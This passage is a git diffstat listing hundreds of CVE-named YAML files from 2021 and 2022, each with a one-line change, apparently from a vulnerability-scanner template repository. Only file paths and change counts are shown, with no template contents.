http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 2 +- http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24347.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 2 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 2 +- http/cves/2021/CVE-2021-24915.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 2 +- http/cves/2021/CVE-2021-24956.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24987.yaml | 2 +- http/cves/2021/CVE-2021-24991.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 2 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25104.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25112.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25118.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26294.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26475.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 2 +- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27124.yaml | 2 +- http/cves/2021/CVE-2021-27132.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 2 +- http/cves/2021/CVE-2021-27651.yaml | 2 +- http/cves/2021/CVE-2021-27670.yaml | 2 +- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28918.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29200.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-31249.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-3129.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32030.yaml | 2 +- http/cves/2021/CVE-2021-32172.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-32789.yaml | 2 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-3378.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34621.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35323.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35395.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-3654.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36748.yaml | 2 +- http/cves/2021/CVE-2021-36749.yaml | 2 +- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38314.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 2 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39327.yaml | 2 +- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40323.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40661.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 +- http/cves/2021/CVE-2021-40856.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40960.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41381.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41648.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41653.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42071.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 2 +- http/cves/2021/CVE-2021-42258.yaml | 2 +- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-42667.yaml | 2 +- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43421.yaml | 2 +- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-44910.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45232.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45382.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45967.yaml | 2 +- http/cves/2021/CVE-2021-45968.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46068.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46073.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2021/CVE-2021-46704.yaml | 2 +- http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0165.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0201.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0208.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0346.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0482.yaml | 2 +- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0535.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0594.yaml | 2 +- http/cves/2022/CVE-2022-0595.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0679.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 2 +- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0814.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0824.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 2 +- http/cves/2022/CVE-2022-0899.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-0952.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1168.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1390.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1398.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1442.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1595.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1903.yaml | 2 +- http/cves/2022/CVE-2022-1904.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1910.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1933.yaml | 2 +- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-1952.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-2187.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22963.yaml | 2 +- http/cves/2022/CVE-2022-22965.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-2314.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-2373.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-2379.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 2 +- http/cves/2022/CVE-2022-23881.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-23944.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 2 +- http/cves/2022/CVE-2022-24181.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24264.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 2 +- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24900.yaml | 2 +- http/cves/2022/CVE-2022-24990.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25125.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25485.yaml | 2 +- http/cves/2022/CVE-2022-25486.yaml | 2 +- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25488.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- 